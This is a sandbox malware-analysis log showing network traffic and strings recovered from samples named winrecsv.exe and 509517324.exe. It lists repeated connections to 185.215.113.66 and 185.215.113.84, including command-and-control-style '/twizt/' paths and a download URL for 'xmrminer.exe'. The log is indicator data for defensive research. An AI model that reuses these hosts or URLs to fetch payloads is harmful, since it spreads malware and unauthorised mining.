                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:33:04 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:33:05 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:33:06 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:33:07 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:33:11 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:33:12 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.194.22.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.194.22.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.194.22.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/
                          Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/B1-4D5E-B0E7-362EE23EA443
                          Source: winrecsv.exe, winrecsv.exe, 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp, winrecsv.exe, 00000005.00000000.377043204.0000000000413000.00000008.00000001.01000000.00000004.sdmp, Id4zlrsrZ4.exe, winrecsv.exe.0.drString found in binary or memory: http://185.215.113.66/twizt/
                          Source: winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.391449369.0000000003176000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.390695269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.392545417.000000000317F000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.390949780.0000000003152000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.391425043.000000000317A000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389739491.000000000317E000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.391456137.000000000317B000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.391892935.000000000317E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/1
                          Source: winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389646709.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389630272.0000000003199000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389653445.00000000031AC000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389580007.0000000003192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/15C5FCA7
                          Source: winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389739491.000000000317E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/19
                          Source: winrecsv.exe, 00000005.00000003.389365979.0000000003153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/1NNC:
                          Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/2
                          Source: winrecsv.exe, 00000005.00000002.607560778.000000000244A000.00000004.00000010.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/3
                          Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/3E8
                          Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/3Strong
                          Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/3l
                          Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/3l=8
                          Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/3lZ9
                          Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/4
                          Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/4lH9
                          Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/5
                          Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/5#8u
                          Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/6
                          Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/6k8
                          Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/twizt/6lS9
                          Source: Id4zlrsrZ4.exe, winrecsv.exe.0.drString found in binary or memory: http://185.215.113.66/twizt/984658winrecsv.exeWindows
                          Source: 509517324.exe, 00000007.00000002.420203300.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmp, 509517324.exe, 00000007.00000000.399548533.00000000010D2000.00000002.00000001.01000000.00000006.sdmp, 509517324.exe.5.drString found in binary or memory: http://185.215.113.84/xmrminer.exe
                          Source: 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/xmrminer.exe(
                          Source: 509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/xmrminer.exeBLk
